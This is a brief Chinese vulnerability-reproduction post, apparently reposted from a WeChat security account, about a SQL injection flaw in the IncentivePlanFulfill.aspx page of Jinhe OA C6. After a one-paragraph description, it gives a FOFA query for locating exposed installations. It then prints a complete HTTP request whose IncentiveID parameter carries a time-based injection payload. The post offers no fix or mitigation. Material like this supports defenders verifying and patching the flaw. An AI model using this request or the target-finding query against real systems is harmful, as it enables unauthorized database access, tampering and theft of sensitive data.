金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞

漏洞描述

金和OA协同办公管理系统IncentivePlanFulfill.aspx存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

资产测绘

FOFA：app="金和网络-金和OA"

漏洞复现

GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1WAITFOR+DELAY+%270:0:6%27--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Cookie: ASP.NET_SessionId=0uha1u0nhrn4meghddjiwu0y
Accept-Encoding: gzip

原文始发于微信公众号（漏洞文库）：【漏洞复现】金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞